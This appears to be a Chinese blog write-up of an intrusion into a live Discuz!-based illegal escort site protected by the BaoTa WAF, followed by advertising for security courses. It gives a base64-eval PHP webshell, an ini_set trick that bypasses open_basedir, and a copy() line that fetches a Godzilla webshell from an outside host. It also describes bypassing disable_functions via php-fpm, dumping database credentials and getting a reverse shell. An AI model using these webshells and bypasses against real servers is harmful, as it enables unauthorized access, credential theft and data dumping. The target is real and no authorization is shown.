这次渗透的主站是 一个Discuz!3.4 的搭建 违法招piao 网站, 配置有宝塔WAF
![](https://i-blog.csdnimg.cn/blog_migrate/99211fbb4c7428bd7b022264a6fe5e89.png)
用 Discuz!ML 3.X 的漏洞进行攻击,但是没有成功
![](https://i-blog.csdnimg.cn/blog_migrate/7bccabeea66254074fce6ff78364b430.png)
发现主站外链会有一个发卡网,引导人们来这充值,是 某某发卡网,而且域名指向也是主站的ip,两个网站在同一个 ,此处忘记截图了
网上有通杀payload,写shell的过程在这里省略了
![](https://i-blog.csdnimg.cn/blog_migrate/8553ae460cc67cadaf6aec37d127200e.png)
1、网络安全学习路线 2、电子书籍(白帽子) 3、安全大厂内部视频 4、100份src文档 5、常见安全面试题 6、ctf大赛经典题目解析 7、全套工具包 8、应急响应笔记
由于网站存在宝塔WAF ,写入shell 必须变形一下,将命令进行base64编码在传进去
<?php @eval(base64_decode($_POST['yanshu']));?>
![](https://i-blog.csdnimg.cn/blog_migrate/8f92d4010bff071cd85d516e3a567d52.png)
在phpinfo()里可以看到,宝塔默认会设置 open_basedir 以及 disable_functions,导致蚁剑的shell直接连接之后不大好用,命令执行不了
绕过 open_basedir 查看文件
利用 ini_set() 来 bypass open_basedir 来获取路径名和目录内容,base64 编码之后执行,发现宝塔目录下还有其他站点目录
eval("mkdir('1');chdir('1');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir('/www/wwwroot'));");
![](https://i-blog.csdnimg.cn/blog_migrate/d9ac883cab19346db4f07d5c026319d1.png)
哥斯拉管理webshell
为了方便查看文件 ,使用哥斯拉马,加密器选择PHP_EVAL_XOR_BASE64,用copy命令传到服务器中,这样流量就可以不会被宝塔waf拦截了
copy('http://xxxx/g.php','/www/wwwroot/xxx.com/g.php');
![](https://i-blog.csdnimg.cn/blog_migrate/945208945fe72ec6486b4ab9f2711dac.png)
哥斯拉马可以自动实现bypass openbase_dir ,读取数据库 用户名密码,可以更改管理员用户进后台或者脱库
![](https://i-blog.csdnimg.cn/blog_migrate/4f075db527342c68dad4a065858248bb.png)
![](https://i-blog.csdnimg.cn/blog_migrate/ac01ac65351c7c4faf1a8d3caaff041e.png)
绕过 disable_functions 执行命令
disable_functions 禁用了 putenv()、mail() 、pcntl_exec() 等函数,环境是php5.6,导致很多常规bypass的方法都用不了
![](https://i-blog.csdnimg.cn/blog_migrate/df316c6e91f85b47b0fbee3eb7435b7d.png)
网站是使用 nginx+php5.6 ,用攻击 php-fpm的办法来bypass,攻击原理可以看 参考链接
先找到php-fpm的配置 如:/www/server/php/56/etc/php-fpm.conf
![](https://i-blog.csdnimg.cn/blog_migrate/17ac39d3bab13f3e84dad0e8a40c97e8.png)
或者看nginx的配置 ,得到 php-fpm 的位置 unix:/tmp/php-cgi-56.sock
![](https://i-blog.csdnimg.cn/blog_migrate/37ae601b2faf4343ae284cbf0eb9cf04.png)
首先 选择 PAttackFPM 将模块加载并执行
![](https://i-blog.csdnimg.cn/blog_migrate/79c0706d763ed331386ef2b502161164.png)
再利用哥斯拉马中 bypass disable_functions 的模块 ,成功执行命令
![](https://i-blog.csdnimg.cn/blog_migrate/4f5c809d5aa06a8f374c968769fd4cc2.png)
获取反弹 shell ,可以进一步尝试对主机进行提权了
![](https://i-blog.csdnimg.cn/blog_migrate/5946aadd83c10e5781d50f5a99572218.png)
网络安全成长路线图
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成hei客大神,这个方向越往后,需要学习和掌握的东西就会越来越多,以下是学习网络安全需要走的方向:
# 网络安全学习方法
上面介绍了技术分类和学习路线,这里来谈一下学习方法:
## 视频学习
无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!